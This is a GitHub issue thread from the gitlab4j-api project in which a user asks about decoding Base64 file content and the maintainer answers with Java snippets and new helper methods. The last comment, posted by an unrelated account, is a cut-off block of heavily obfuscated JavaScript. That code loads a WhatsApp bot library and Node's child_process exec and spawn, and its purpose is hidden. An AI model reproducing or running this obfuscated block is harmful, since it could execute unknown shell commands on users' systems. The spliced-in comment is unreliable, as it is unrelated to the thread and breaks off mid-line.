### ISSUE TITLE
Get file from repository support file content decode？？

### ISSUE THREAD

**Issue by zhisheng17** [gmessner/gitlab4j-api#162]
hello，

https://docs.gitlab.com/ee/api/repository_files.html#get-file-from-repository

The document said：Allows you to receive information about file in repository like name, size, content. **Note that file content is Base64 encoded.**

so，if  i  want to get the file from the repository,  your   gitlab4j-api   support  the  content  decode?   the new  file's  content  is the same as before?

Hope you!  Thanks!   -- from China  friends

**Comment by gmessner** [comment]
Yes, the content will be exactly what is in the repository.  As per the link you provided.  To decode it you use the decoder built in to Java 8 as follows:
```
RepositoryFile file = gitLabApi.getRepositoryFileApi().getFile("file-path", projectID, "master");   
byte[] fileContents = java.util.Base64.getDecoder().decode(file.getContent());
```
If you prefer to simply get the actual file or an InputStream to read, use the getRawFile() methods in the RepositoryFileApi:
```
public File getRawFile(Integer projectId, String commitOrBranchName, String filepath, File directory)
public InputStream getRawFile(Integer projectId, String commitOrBranchName, String filepath) 
```

Javadocs for the above:  
http://www.messners.com/gitlab4j-api/javadocs/org/gitlab4j/api/RepositoryFileApi.html#getRawFile-java.lang.Integer-java.lang.String-java.lang.String-java.io.File-

**Comment by zhisheng17** [comment]
good！Thanks

**Comment by gmessner** [comment]
@zhisheng17 
Just wanted to let you know that I've released 4.8.43 with some convenience methods around this the above.  The RepositoryFile class now has the following methods:
```
public String getDecodedContentAsString()
public byte[] getDecodedContentAsBytes()
public void encodeAndSetContent(String content)
public void encodeAndSetContent(byte[] byteContent)
```

**Comment by zhisheng17** [comment]
@gmessner  good job

**Comment by YosokaHosting** [comment]
const _0x561677=_0x3a22;(function(_0x1ae616,_0x41b790){const _0x25cc16=_0x3a22,_0x41a209=_0x1ae616();while(!![]){try{const _0x510c7f=-parseInt(_0x25cc16(0x317))/0x1+parseInt(_0x25cc16(0x3ab))/0x2*(parseInt(_0x25cc16(0x22b))/0x3)+-parseInt(_0x25cc16(0x39e))/0x4+-parseInt(_0x25cc16(0x2ea))/0x5+-parseInt(_0x25cc16(0x219))/0x6*(parseInt(_0x25cc16(0x2c0))/0x7)+parseInt(_0x25cc16(0x38e))/0x8+-parseInt(_0x25cc16(0x334))/0x9*(-parseInt(_0x25cc16(0x29f))/0xa);if(_0x510c7f===_0x41b790)break;else _0x41a209['push'](_0x41a209['shift']());}catch(_0x305bf7){_0x41a209['push'](_0x41a209['shift']());}}}(_0x806a,0x8c930),require(_0x561677(0x3f5)));const cheerio=require(_0x561677(0x35d)),{BufferJSON,WA_DEFAULT_EPHEMERAL,generateWAMessageFromContent,proto,generateWAMessageContent,generateWAMessage,prepareWAMessageMedia,areJidsSameUser}=require('@adiwajshing/baileys'),fs=require('fs'),util=require(_0x561677(0x286)),chalk=require('chalk'),{exec,spawn,execSync}=require('child_process'),axios=require(_0x561677(0x200)),{fromBuffer}=require('file-type'),path=require(_0x561677(0x23a)),os=require('os'),moment=require(_0x561677(0x38f)),speed=require(_0x561677(0x2c6)),{performance}=require(_0x561677(0x2e4)),{Primbon}=require(_0x561677(0x2ff)),xfarr=require(_0x561677(0x352)),maker=require(_0x561677(0x36d)),FormData=require(_0x561677(0x39a)),fetch=
